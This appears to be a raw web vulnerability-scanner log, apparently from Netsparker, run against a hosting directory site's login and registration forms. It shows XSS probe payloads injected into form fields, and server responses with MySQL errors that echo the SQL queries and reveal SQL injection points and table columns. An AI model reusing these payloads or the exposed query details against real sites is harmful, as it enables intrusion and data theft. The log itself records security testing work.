width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='325A5101EE356073203CE012C4F975CDC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='325A5101EE356073A054CC733A24104A6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='325A5101EE356073EFBC815A5A6C2971C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE35607352B223643F653864C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='325A5101EE356073E4EF56444E811DB46F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='325A5101EE3560735C149D85B3135A20C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='325A5101EE356073543655568C760C3CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='325A5101EE3560732EB16AD94C0BA2036F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='325A5101EE3560738B33BDECF778A768C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='325A5101EE356073DE4C4A6CB2CBED426F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='325A5101EE356073D99FE89143D2CC92C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='325A5101EE356073872AE9734103A54EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='325A5101EE35607395417AEFF9C2D4BAC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073ABF98BA05287710FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='325A5101EE356073A94EC486A3790506C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='325A5101EE3560737A0A5A544F0C574EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='325A5101EE3560731533C3BDC0085AD96F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='325A5101EE35607349487070294DD0066F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='325A5101EE356073DAB2B66D73557FED6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
B1
POST
Login
form_field
POST
1
password
POST
3
remember_both
POST
1
remember_mail
POST
1
temp_check
POST
755
user_login
POST
'"--></style></script><script>alert(0x001D83)</script>
Request
POST /advert_login.php HTTP/1.1 Referer: http://www.hostingcatalog.com/advert_login.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 176 Accept-Encoding: gzip, deflate B1=Login&form_field=1&password=3&remember_both=1&remember_mail=1&temp_check=755&user_login='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D83)%3c%2fscript%3e
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:57:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 388 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001d83)</script>' AND active NOT IN (2' at line 1 in SQL SELECT account_id,password FROM account WHERE e_mail=''"--></style></script><script>netsparker(0x001d83)</script>' AND active NOT IN (2,3,4)
Parameters
Parameter
Type
Value
company_name
POST
'"--></style></script><script>alert(0x001D84)</script>
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 540 Accept-Encoding: gzip, deflate company_name='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D84)%3c%2fscript%3e&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:17:08 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 338 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001D84)</script>'' at line 1 in SQL SELECT account_id FROM account WHERE company_name=''"--></style></script><script>netsparker(0x001D84)</script>'
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
'"--></style></script><script>alert(0x001D85)</script>
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 540 Accept-Encoding: gzip, deflate company_name=Smith&first_name='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D85)%3c%2fscript%3e&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:17:11 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='76E0188F5F077DBD07E8CE23B2E90A91C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='76E0188F5F077DBD592BD37523D41FEA6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='76E0188F5F077DBD2C27DA94B3C3B1B8C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBD340EA7B2BC8A22B8C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='76E0188F5F077DBD41C8730B9C86CA8B6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='76E0188F5F077DBD830D23986393E080C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='76E0188F5F077DBDBA5E0588C57F7A39C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='76E0188F5F077DBDF7E91C57F9D527D06F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='76E0188F5F077DBD81867230C614D80BC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='76E0188F5F077DBD3AA9ACBA7051BF106F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='76E0188F5F077DBD8F008AC94083CF61C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='76E0188F5F077DBD85BE4CD0AF744F08C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='76E0188F5F077DBD02C95BA9792B54A5C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBDC5DEC01153508375C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='76E0188F5F077DBD4D064D4D53154948C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='76E0188F5F077DBD44A3C63D75A7293FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='76E0188F5F077DBDFDBB6FA368FBDE566F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='76E0188F5F077DBD549D8064E275C3C96F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='76E0188F5F077DBD771C0C2A87E4991C6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
'"--></style></script><script>alert(0x001D86)</script>
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 540 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D86)%3c%2fscript%3e&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:17:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = 